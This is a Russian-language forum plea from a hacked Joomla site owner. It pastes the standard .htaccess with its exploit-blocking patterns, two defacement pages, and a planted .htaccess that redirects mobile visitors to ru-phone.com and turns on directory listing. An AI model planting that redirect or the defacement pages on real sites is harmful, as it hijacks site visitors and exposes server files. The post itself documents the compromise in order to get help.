Несколько дней назад обнаружил вирус вместо загрузки индексовой страницы, он поменял основной файл indeх на indeх2.
Я удалил его и переименовал папку index2 обратно в index. Но система все равно не работает.
Сегодня обнаружил что index нормальная вообще пропала. Вместо нее вирусняк. Старой не осталось, даже в скачке, удалил по-глупости (((
Хронология такая:
htacess 26/04##
# @version $Id: htaccess.txt 21064 2011-04-03 22:12:19Z dextercowley $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license
http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##
php_flag register_globals off
#####################################################
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations. It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file. If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your SEF url's. If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################
## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks
php_value max_execution_time 600
php_value upload_max_filesize 4M
#
# mod_rewrite in use
RewriteEngine On
########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension XML files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension XML files
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode data within the URL
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
########## End - Rewrite rules to block out some common exploits
########## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
########## End - Custom redirects
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root)
# RewriteBase /
########## Begin - Joomla! core SEF Section
#
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} (/[^.]*|\.(php|html?|feed|pdf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#
########## End - Joomla! core SEF Section
htacess 27/04##
# @version $Id: htaccess.txt 21064 2011-04-03 22:12:19Z dextercowley $
# @package Joomla
# @copyright Copyright (C) 2005 - 2010 Open Source Matters. All rights reserved.
# @license
http://www.gnu.org/copyleft/gpl.html GNU/GPL
# Joomla! is Free Software
##
php_flag register_globals off
#####################################################
# READ THIS COMPLETELY IF YOU CHOOSE TO USE THIS FILE
#
# The line just below this section: 'Options +FollowSymLinks' may cause problems
# with some server configurations. It is required for use of mod_rewrite, but may already
# be set by your server administrator in a way that dissallows changing it in
# your .htaccess file. If using it causes your server to error out, comment it out (add # to
# beginning of line), reload your site in your browser and test your SEF url's. If they work,
# it has been set by your server administrator and you do not need it set here.
#
#####################################################
## Can be commented out if causes errors, see notes above.
Options +FollowSymLinks
php_value max_execution_time 600
php_value upload_max_filesize 4M
#
# mod_rewrite in use
RewriteEngine On
########## Begin - Rewrite rules to block out some common exploits
## If you experience problems on your site block out the operations listed below
## This attempts to block the most common type of exploit `attempts` to Joomla!
#
## Deny access to extension XML files (uncomment out to activate)
#<Files ~ "\.xml$">
#Order allow,deny
#Deny from all
#Satisfy all
#</Files>
## End of deny access to extension XML files
# Block out any script trying to set a mosConfig value through the URL
RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
# Block out any script trying to base64_encode data within the URL
RewriteCond %{QUERY_STRING} base64_encode[^(]*\([^)]*\) [OR]
# Block out any script that includes a <script> tag in URL
RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR]
# Block out any script trying to set a PHP GLOBALS variable via URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
# Block out any script trying to modify a _REQUEST variable via URL
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Return 403 Forbidden header and show the content of the root homepage
RewriteRule .* index.php [F]
#
########## End - Rewrite rules to block out some common exploits
########## Begin - Custom redirects
#
# If you need to redirect some pages, or set a canonical non-www to
# www redirect (or vice versa), place that code here. Ensure those
# redirects use the correct RewriteRule syntax and the [R=301,L] flags.
#
########## End - Custom redirects
# Uncomment following line if your webserver's URL
# is not directly related to physical file paths.
# Update Your Joomla! Directory (just / for root)
# RewriteBase /
########## Begin - Joomla! core SEF Section
#
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
#
# If the requested path and file is not /index.php and the request
# has not already been internally rewritten to the index.php script
RewriteCond %{REQUEST_URI} !^/index\.php
# and the request is for root, or for an extensionless URL, or the
# requested URL ends with one of the listed extensions
RewriteCond %{REQUEST_URI} (/[^.]*|\.(php|html?|feed|pdf|raw))$ [NC]
# and the requested path and file doesn't directly match a physical file
RewriteCond %{REQUEST_FILENAME} !-f
# and the requested path and file doesn't directly match a physical folder
RewriteCond %{REQUEST_FILENAME} !-d
# internally rewrite the request to the index.php script
RewriteRule .* index.php [L]
#
########## End - Joomla! core SEF Section
index 26/04 c вирусомhtml>
<title>Hacked By iLLegaLGrup </title>
<head>
</head>
<body
bgcolor="black">
<center><br>
<img src="
"><br><br>
<font
color="white" face="Georgia">
<div style="text-shadow: 1px 1px 5px #fff; font: 30px Tahoma;">#./</font><font
color="#FF0000" face="Georgia">HAC</font><font
color="white" face="Georgia">K3D</font><font
color="#FF0000" face="Georgia">#</font><font
color="white" face="Georgia"> iL</font><font
color="#FF0000" face="Georgia">Leg</font><font
color="white" face="Georgia">aL</font><p></div>
<font
color="#FF0000" face="Georgia"><p>Gelecez Dedikte Gelmedikmi Be Gülüm
</font><font face="Georgia" color="#FFFFFF"></font><font
index 27/04<HTML><HEAD><TITLE>Hacked By Executi0n3r</TITLE>
<META http-equiv=Content-Language content=tr>
<META http-equiv=Content-Type content="text/html; charset=windows-1254">
<META content="MSHTML 6.00.2900.2180" name=GENERATOR>
</HEAD>
<body bgcolor="#000000">
<div align="center">
<img src="
" ><br>
<p align="center"><font style="font-size: 30pt;" color="#ffffff" face="nurol"><font color="#FF0000">HACKED By</font>
Executi0n3r|Trzibit</font></font><br>
<br>
<br><font color="#FFFFFF" size="5">Ne Mutlu Türküm Diyene !</font><br>
<br>
<br><font color="#FFFFFF" size="5">Pow3rz Siker Dedim Dedim Inanmadiniz Bakin Ne Oldu Simdi
</font><br>
<center>
</center>
<img src="
" ><br>
<marquee direction=right><p align="center"><font style="font-size: 15pt;" color="#ffffff" face="Georgia"><font
color="#FF0000">
Dostlar: SkyTurk|Hacker_İnfazcı|Th3hqcke4|Atess|Mario|Trzibit</font></font><br></marquee>
<h2>
<script language="JavaScript1.2">
/*
Neon Lights Text
By Website Abstraction (
http://wsabstract.com)
Over 400+ free scripts here!
*/
var message="hacked"
var neonbasecolor="red"
var neontextcolor="yellow"
var flashspeed=100 //in milliseconds
///No need to edit below this line/////
var n=0
if (document.all){
document.write('<font color="'+neonbasecolor+'">')
for (m=0;m<message.length;m++)
document.write('<span id="neonlight">'+message.charAt(m)+'</span>')
document.write('</font>')
//cache reference to neonlight array
var tempref=document.all.neonlight
}
else
document.write(message)
function neon(){
//Change all letters to base color
if (n==0){
for (m=0;m<message.length;m++)
tempref[m].style.color=neonbasecolor
}
//cycle through and change individual letters to neon color
tempref[n].style.color=neontextcolor
if (n<tempref.length-1)
n++
else{
n=0
clearInterval(flashing)
setTimeout("beginneon()",1500)
return
}
}
function beginneon(){
if (document.all)
flashing=setInterval("neon()",flashspeed)
}
beginneon()
</script>
</h2>
!</font></span><br><center><object type="application/x-shockwave-flash"
data="
http://flash-mp3-player.net/medias/player_mp3_mini.swf" width="200" height="20"> <param name="movie"
value="
http://flash-mp3-player.net/medias/player_mp3_mini.swf" /> <param name="bgcolor" value="#000000" /><param
name="FlashVars" value="mp3=http://k004.kiwi6.com/hotlink/4qlv0v1xqi/pow3rz.mp3 &autoplay=1" /></object>
</div> </div> <p> </p></div><script type="text/javascript"
src="//ajax.cloudflare.com/cdn-cgi/nexp/v=49212922/apps1.min.js"></script><script
type="text/javascript">__CF.AJS.init1();</script></center>
htacess без расширения txt 27/04RewriteEngine on
RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]
RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]
RewriteCond %{HTTP_USER_AGENT} !america [NC]
RewriteCond %{HTTP_USER_AGENT} !avant [NC]
RewriteCond %{HTTP_USER_AGENT} !download [NC]
RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]
RewriteRule ^(.*)$
http://ru-phone.com [L,R=302]
Options +Indexes